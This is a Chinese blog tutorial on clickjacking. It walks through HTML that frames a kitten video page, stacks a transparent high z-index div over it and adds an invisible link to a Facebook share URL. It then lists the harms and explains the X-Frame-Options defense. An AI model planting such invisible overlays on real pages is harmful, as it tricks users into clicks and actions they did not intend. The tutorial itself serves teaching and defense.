有趣的漏洞原理——点击劫持(可爱的小猫居然想要和你吹一瓶?)

最新推荐文章于 2025-11-27 00:03:34 发布
原创 最新推荐文章于 2025-11-27 00:03:34 发布 · 482 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#html5 #html #php #点击劫持 #漏洞原理

点击劫持是一种网络攻击手段,通过伪装链接诱导用户执行恶意操作。攻击者利用透明iframe和高z-index实现。防范措施包括在页面添加透明div层和无形链接,以及设置X-Frame-Options HTTP头部,阻止页面在框架中加载。点击劫持可能危及用户登录凭证、隐私和设备安全。预防措施对于保护网络安全至关重要。

有趣的漏洞原理——点击劫持

环境介绍

点击劫持是一种通过将链接伪装成其他东西来诱使网站用户点击有害链接的方法。
点击劫持攻击诱使网络用户执行他们不打算执行的操作,通常是通过在用户认为他们正在执行的操作之上呈现一个不可见的页面元素。

网页里有个小猫的视频,点击它会正常开始播放视频

在这里插入图片描述

进入正题

假设你的代码是下面这样。

<html>
  <head>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }
    </style>
  </head>
  <body>
    <iframe src="www.kittens.com/vacuum-revenge">
    </iframe>
  </body>
</html>

一些黑客会利用相似的站点来伪装,比如
www.k1tt3ns.com/vacuum-revenge

搞定它

在页面上面加一个透明的div标签

..带有透明的 DIV 覆盖 ...
<html>
  <head>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe, div {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }

      div {
        z-index: 100;
      }
    </style>
  </head>
  <body>
    <iframe src="www.kittens.com/vacuum-revenge">
    </iframe>
    <div></div>
  </body>
</html>
  • 再加上一个无形的链接,把要跳转的链接加进去
<html>
  <head>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe, div, a {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }

      div {
        z-index: 100;
      }

      a {
        display: block;
      }
    </style>
  </head>
  <body>
    <iframe src="www.kittens.com/vacuum-revenge">
    </iframe>
    <div>
      &lt;a href=&quot;https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fwww.fakewebsite.com&quot;&gt;&lt;/a&gt;
    </div>
  </body>
</html>

这样如果再点击视频,攻击者就会将你带到各种神奇的地方。

比如:

在这里插入图片描述

危害!

通过在真实登录框之上渲染一个虚假登录框来获取登录凭据。 通过在 Adob​​e Flash
设置页面上呈现不可见元素,诱使用户打开他们的网络摄像头或麦克风。
在社交媒体网站上传播蠕虫。
通过诱骗人们点击他们原本不会点击的东西来宣传在线诈骗。 通过将用户转移到恶意下载链接来传播恶意软件。

如何预防!

  • X-Frame-Options
    在X-Frame-Options HTTP标头可以被用于指示浏览器是否应该被允许在渲染页面, 或标签。它专门设计用于帮助防止点击劫持。

标头有三个允许的值:

DENY 无论站点如何尝试,都无法在框架中显示该页面。
SAMEORIGIN 页面只能显示在与页面本身相同来源的框架中。
ALLOW-FROM uri 页面只能显示在指定来源的框架中。

在这里插入图片描述

【Web安全】点击劫持漏洞
李同學的安全圈
11-25 1648
本篇文章主要介绍点击劫持漏洞原理、危害以及验证方式,切勿将文中攻击手法用于非授权下渗透攻击行为!!!点击劫持(Click Jacking),是一种视觉上的欺骗手段,也被称为UI-覆盖攻击。攻击者通过使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,通过调整iframe页面的位置,可以使得伪造的页面恰好iframe里受害页面里的一些功能重合(点击按钮或活动选项),以达到窃取用户信息或者劫持用户操作的目的。
点击劫持漏洞(ClickJacking)
墨痕诉清风的博客
04-24 421
官方定义:点击劫持(也称为界面伪装攻击或UI矫正攻击)是一种网络攻击手段,通过篡改网页或利用其他技术手段,使用户在点击某个链接时,重定向到攻击者控制的网页或执行恶意操作,从而获取用户的隐私信息或进行其他非法活动。通过调整iframe页面的位置,可以诱使用户恰好点击iframe页面的一些功能性按钮上,导致被劫持。创建虚假页面,iframe src=嵌入要欺骗点击的页面,这里要对一下坐标,让虚假的按钮可正好点击到用户要被欺骗的页面按钮。SAMEORIGIN:frame页面的地址只能为同源域名下的页面。
前端安全攻防指南:XSS / CSRF / 点击劫持与常见防护实践(含真实案例拆解)
最新发布
李游的博客
11-27 837
前端安全常被忽视,但XSS、CSRF点击劫持漏洞可能导致严重后果。本文剖析了三种常见攻击方式:XSS通过注入恶意脚本执行攻击,需对用户输入做HTML转义;CSRF利用浏览器自动携带Cookie的特性伪造请求,应使用CSRF TokenSameSite Cookie防御;点击劫持通过透明iframe诱导用户误操作,可通过X-Frame-Options响应头防护。建议建立安全基线:统一封装请求层自动处理CSRF Token,组件层避免直接使用innerHTML,配置CSPESLint规则约束危险操作。安
WEB应用程序点击劫持漏洞研究及防御方法
12-11
web程序劫持漏洞及防御的方法。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
点击劫持漏洞
大河之犬的博客
05-28 1326
点击劫持攻击中,用户被欺骗点击网页上的一个不可见或伪装成不同元素的元素。这种操纵可能会对用户造成意外后果,如下载恶意软件,重定向到恶意网页,提供凭据或敏感信息,转账,或在线购买产品。
低危漏洞修复——点击劫持X-Frame-Options响应头缺失
后端开发
07-11 2800
X-Frame-Options响应头缺失,导致攻击者使用一个或多个透明的iframe覆盖在正常网页上,诱使用户在网页上进行操作,当用户在不知情的情况下点击透明的iframe页面时,用户的操作已被劫持到攻击者事先设计的恶意按钮或链接上。
点击劫持漏洞案例ppt
01-02
### 点击劫持漏洞详解 #### 一、点击劫持概述 点击劫持(Clickjacking),又称UI-覆盖攻击(UI Redress...总之,点击劫持是一种需要高度重视的安全威胁,开发者用户都应当了解其工作原理,并采取有效措施加以防范。
点击劫持漏洞原理及利用包含修复建议
课嗨教育的专栏
01-12 4099
今天群里有人问如何查看是否存在点击劫持漏洞,我们首先了解下漏洞是如何产生的,点击劫持漏洞是因为网站未对referer来源进行验证导致的。 具体测试及利用的话我们可以用iframe制作一个透明标签在上面: 案例: <!DOCTYPE HTML> <html> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <head> <title>点击劫持<
精选资源
移动开发构架漫谈——反劫持实战篇
02-25
DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或访问的是假网址...
vue2数据响应式原理——数据劫持(初始篇)
前端之行,任重道远!
05-09 4152
深入浅出带你摸透vue2数据响应式原理
点击劫持(Clickjacking)漏洞技术内幕
10-15 1183
 Clickjacking是OWASP_NYC_AppSec_2008_Conference的一个保密的议题,以下是一些攻击的描叙:  当你访问一个恶意网站的时候,攻击者可以控制你的浏览器对一些链接的访问,这个漏洞影响到几乎所有浏览器以及所有版本的Flash等浏览器相关的第三方软件,除非你使用lynx一类的字符浏览器。  这个漏洞与JavaScript无关,即使你关闭浏览器的JavaScr
十四、点击劫持漏洞
weixin_46849264的博客
03-24 624
点击劫持漏洞
点击劫持漏洞修复
YXWik的博客
05-21 1770
点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击。 解决方案: 在nginx配置中的location 下添加 add_header X-Frame-Options SAMEORIGIN; ...
点击劫持漏洞(附测试代码)】
优快云Romance的博客
11-07 1385
点击劫持(Clickjacking)是一种网络攻击技术,攻击者通过将一个恶意的页面或按钮隐藏在合法网站的页面下,诱使用户在不知情的情况下点击隐藏的内容,从而触发攻击者设计的操作。点击劫持的主要攻击原理是利用网页的iframe嵌套特性,将恶意网页通过iframe的方式嵌入到合法网站的页面上。使用X-Frame-Options头:通过在HTTP响应中设置X-Frame-Options: DENY或X-Frame-Options: SAMEORIGIN,防止页面被其他站点以iframe的方式嵌入。
点击劫持原理、案例与防御策略
点击劫持原理在于视觉欺骗,攻击者通过精细调整iframe的位置透明度,使之几乎与背景融为一体,用户在无意中点击了隐藏的恶意iframe,导致实际操作并非用户所预期。当网站允许iframe嵌入并缺乏有效的防护机制时,...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

征__程

多动手,避免老年痴呆,活跃身心

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值